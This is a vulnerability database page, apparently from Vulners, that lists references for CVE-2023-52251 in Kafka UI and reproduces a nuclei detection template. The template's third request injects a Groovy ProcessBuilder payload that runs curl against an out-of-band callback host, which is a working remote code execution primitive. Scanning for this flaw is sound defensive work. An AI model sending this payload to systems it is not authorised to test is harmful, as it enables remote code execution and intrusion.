Lucene search
K

Kafka UI 0.7.1 Command Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 78 Views

Kafka UI 0.7.1 Command Injection, allows remote code execution via q paramete

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Kafka UI 0.7.1 Command Injection Exploit
20 Feb 202400:00
zdt
GithubExploit
Exploit for Code Injection in Provectus Ui
6 Jan 202411:07
githubexploit
BDU FSTEC
The vulnerability in the Apache Kafka cluster management web interface, kafka-ui, allows a attacker to execute arbitrary code.
26 Feb 202400:00
bdu_fstec
Circl
CVE-2023-52251
25 Jan 202422:26
circl
CNNVD
kafka-ui OS Command Injection Vulnerability
25 Jan 202400:00
cnnvd
CVE
CVE-2023-52251
25 Jan 202400:00
cve
Cvelist
CVE-2023-52251
25 Jan 202400:00
cvelist
Metasploit
Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.
17 Feb 202419:51
metasploit
NVD
CVE-2023-52251
25 Jan 202421:15
nvd
OSV
CVE-2023-52251
25 Jan 202421:15
osv
Rows per page
id: CVE-2023-52251

info:
  name: Kafka UI 0.7.1 Command Injection
  author: yhy0,iamnoooob
  severity: high
  description: |
    An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
  impact: |
    Authenticated attackers can inject and execute arbitrary commands via Groovy script injection in the filterQueryType parameter.
  remediation: |
    Upgrade Kafka UI to version 0.7.2 or later.
  reference:
    - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html
    - https://github.com/BobTheShoplifter/CVE-2023-52251-POC
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-52251
    cwe-id: CWE-94
    epss-score: 0.85025
    epss-percentile: 0.99685
    cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: provectus
    product: ui
    framework: kafka
    fofa-query: icon_hash="-1477045616"
  tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm,vuln,vkev

http:
  - raw:
      - |
        GET /api/clusters HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: cluster-name
        internal: true
        json:
          - '.[0].name'

  - raw:
      - |
        GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: topic-name
        internal: true
        json:
          - '.topics[].name'

  - raw:
      - |
        @timeout 20s
        GET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - 'Assigning partitions'
# digest: 4a0a0047304502205129876f997ec0c3db2e1579abeac73c205cd59bc5da9c494f611f05a58b51ef022100e02145fc45e48059ee323d25afbf20ef0dfcc3da333680f6183ed206b02912a5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.18.8
EPSS0.85025
SSVC
78